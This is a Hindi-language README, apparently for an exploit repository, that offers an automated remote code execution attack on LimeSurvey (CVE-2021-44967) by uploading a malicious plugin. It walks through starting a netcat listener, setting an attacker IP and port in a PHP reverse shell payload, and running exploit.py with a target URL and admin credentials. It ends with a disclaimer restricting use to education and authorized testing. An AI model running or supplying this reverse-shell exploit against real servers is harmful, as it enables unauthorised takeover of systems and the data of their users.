
🔥 Limesurvey के लिए स्वचालित RCE एक्सप्लॉइट (CVE-2021-44967)। विशेषाधिकार वृद्धि के लिए अनुकूलित एक्सप्लॉइट श्रृंखला। 🚀
इस रिपॉजिटरी में LimeSurvey में CVE-2021-44967 के लिए एक कार्यात्मक शोषण शामिल है, जो एक प्रमाणित दूरस्थ कोड निष्पादन भेद्यता है।
परीक्षणित और कार्यशील पुष्टि:
यह भेद्यता प्रशासनिक विशेषाधिकारों वाले प्रमाणित उपयोगकर्ता को एक दुर्भावनापूर्ण प्लगइन अपलोड करने की अनुमति देती है। चूंकि LimeSurvey प्लगइन ZIP की सामग्री को सख्ती से मान्य नहीं करता है या प्लगइन निर्देशिका में PHP फ़ाइलों के निष्पादन को रोकता नहीं है, एक हमलावर अपलोड किए गए शेल तक सीधे पहुँच कर RCE प्राप्त कर सकता है।
config.xml अपडेट किया गया।अपनी मशीन पर netcat लिसनर प्रारंभ करें:
nc -lvnp 443
php-rev.php को संपादित करें और अपना स्थानीय IP और पोर्ट सेट करें:
$ip = '<YOUR_IP>';
$port = 443;
python3 exploit.py <TARGET_URL> <USERNAME> <PASSWORD>
उदाहरण:
python3 exploit.py http://10.129.1.243/survey admin test
exploit.py: मुख्य स्वचालन स्क्रिप्ट।php-rev.php: PHP रिवर्स शेल पेलोड।config.xml: अनिवार्य LimeSurvey प्लगइन कॉन्फ़िगरेशन फ़ाइल।यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए है। इसे केवल नियंत्रित, कानूनी वातावरण (जैसे CTFs, प्रयोगशाला वातावरण, या अधिकृत संलग्नताओं) में उपयोग के लिए सख्ती से इरादा है। लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है। इसका जिम्मेदारी से उपयोग करें और केवल उन प्रणालियों पर जिनका परीक्षण करने के लिए आपके पास स्पष्ट अनुमति है।